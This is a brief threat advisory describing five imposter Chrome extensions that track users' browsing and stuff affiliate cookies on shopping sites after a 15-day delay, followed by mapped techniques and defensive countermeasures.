VTA-00422 – Malicious Cookie Stuffing by Chrome Extensions
Five imposter extensions for the Google Chrome web browser masquerading as Netflix viewers and others have been found to track users’ browsing activity and profit of retail affiliate programs. The extensions offer various functions such as enabling users to watch Netflix shows together, website coupons, and taking screenshots of a website. Apart from offering the intended functionality, the extensions also track the user’s browsing activity. Every website visited is sent to servers owned by the extension creator. They do this so that they can insert code into eCommerce websites being visited. This action modifies the cookies on the site so that the extension authors receive affiliate payment for any items purchased. Also, they have an interesting way of dodging detection by delaying the “attack” by 15 days after the first installation.
Collection, Defense Evasion
Application Layer Protocol, Masquerading, Automated Collection, Browser Extension, System Time Discovery
Active Defense Tactics:
Active Defense Techniques:
Baseline, Network Monitoring, Software Manipulation, System Activity Monitoring
Indicator of Compromise:
SuperPRO’s Threat Countermeasures Procedures:
1. Adding the IOC signature into endpoint security protection as the custom threat detection rules.
2. Always analyze the authenticity of permission request by web extension.
3. Make sure the developer/publisher has a clean record.
4. It is important to review the extensions’s privacy policies and how they collect data.
5. Ensure that the installed extensions are reviewed on a periodic basis.
Contributed by: aman